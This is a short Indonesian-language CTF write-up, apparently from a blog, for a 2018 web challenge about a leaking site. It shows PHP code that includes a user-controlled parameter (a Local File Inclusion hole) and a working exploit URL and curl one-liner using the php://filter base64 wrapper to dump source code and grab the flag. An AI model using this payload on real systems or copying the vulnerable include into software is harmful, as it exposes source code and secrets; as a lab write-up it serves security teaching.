 |
| Write Up Online CTF HUT DISINFOLAHTAD KE 42 2018 {Web Application - Situs yang Bocor} |
Soal : Coba dapatkan sumber kode main_page.
index.php:
Flag : flag{0h_n0_php_y0ur_l3aking_4ll_0ver}
index.php:
<?php
if(isset($_GET['resource'])){
include($_GET['resource'] . '.php');
} else {
header("Location: /index.php?resource=main_page");
}
?>
Flag : flag{0h_n0_php_y0ur_l3aking_4ll_0ver}
Referensi Tools :
- curl
- Manual Test
PoC (Proof of Concept):
1. Pada Challenge ini, peserta diberikan soal web aplikasi yang terdapat bug Local File Inclusion.
2. Source code di ambil menggunakan php wrapper yaitu dengan php://filter/, jika di gabungkan dengan URL soal menjadi seperti berikut :
http://54.169.108.58:8001/index.php?resource=php://filter/convert.base64-encode/resource=main_page
3. Gunakan curl untuk request Lakukan decode menggunakan base64 –d
2. Source code di ambil menggunakan php wrapper yaitu dengan php://filter/, jika di gabungkan dengan URL soal menjadi seperti berikut :
http://54.169.108.58:8001/index.php?resource=php://filter/convert.base64-encode/resource=main_page
curl http://54.169.108.58:8001/index.php?resource=php://filter/convert.base64-encode/resource=main_page | base64 -d | grep flag
Write Up Online CTF HUT DISINFOLAHTAD KE 42 2018 {Web Application - Situs yang Bocor}
Reviewed by Sitakom Blog
on
8:23 PM
Rating:
Reviewed by Sitakom Blog
on
8:23 PM
Rating:
No comments: